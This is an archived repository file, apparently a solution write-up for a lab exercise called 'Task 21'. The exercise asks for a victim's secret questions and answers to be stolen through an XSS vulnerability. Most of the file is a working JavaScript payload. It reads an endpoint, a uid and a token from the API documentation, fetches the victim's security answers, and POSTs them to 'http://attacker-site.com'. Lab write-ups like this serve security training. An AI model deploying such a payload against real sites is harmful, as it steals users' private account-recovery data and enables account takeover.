Skip to content
This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
42 lines (32 loc) · 3.21 KB

TASK_21.md

File metadata and controls

42 lines (32 loc) · 3.21 KB
Raw

Task 21 [Try Now]

Objectives:

  1. Find John's Secret Questions+Answers using an XSS vulnerability on this page
  2. Display the Questions+Answers in the div with id "result"
  3. Send the Questions+Answers to your Attack Server
  4. No Hardcoded values can be used - everything has to be figured out dynamically

When you will see the API documentation, it is basically in XML and as per 4th point, everything should be dynamic.

So the regex that would be used are /<endpoint>(.+?)<\/endpoint>/, /<uid-param-value>(.+?)<\/uid-param-value>/ and /<token-param-value>(.+?)<\/token-param-value>/

let xhr = new XMLHttpRequest();

xhr.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    let ep = /<endpoint>(.+?)<\/endpoint>/.exec(this.responseText)[1];
    let uid = /<uid-param-value>(.+?)<\/uid-param-value>/.exec(this.responseText)[1];
    let tok = /<token-param-value>(.+?)<\/token-param-value>/.exec(this.responseText)[1];

    let xhr1 = new XMLHttpRequest();
    xhr1.onreadystatechange = function () {
      if (this.readyState == 4 && this.status == 200) {
        let xhr2 = new XMLHttpRequest();
        xhr2.open("POST", "http://attacker-site.com", true);
        xhr2.setRequestHeader("Content-Type", "application/json");
        xhr2.send(this.responseText);
      }
    };

    xhr1.open("GET", location.origin + ep + "?uid=" + uid + "&token=" + tok, true);
    xhr1.send();
  }
};

xhr.open("GET", document.querySelector("a").href, true);
xhr.send();

For POC, Click Here